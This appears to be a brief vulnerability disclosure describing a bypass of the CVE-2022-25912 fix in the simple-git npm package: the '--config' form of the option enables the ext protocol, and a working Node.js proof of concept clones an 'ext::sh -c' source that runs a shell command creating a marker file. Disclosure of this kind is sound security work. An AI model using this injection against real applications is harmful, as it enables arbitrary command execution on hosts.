The mitigation for CVE-2022-25912 appears to block the -c option but not the equivalent --config form. If untrusted input can reach the options argument passed to simple-git, an attacker may still achieve remote code execution by enabling protocol.ext.allow=always and using an ext:: clone source.
const simpleGit = require('simple-git')
const myGit = simpleGit()
myGit.clone('ext::sh -c touch% /tmp/pwned_by_kkc% >&2', '/tmp/example-new-repo', ['--config', 'protocol.ext.allow=always'])
Applications that pass attacker-controlled input into the options argument of the clone function in the simple-git npm package may allow arbitrary command execution on the host running the Node.js process.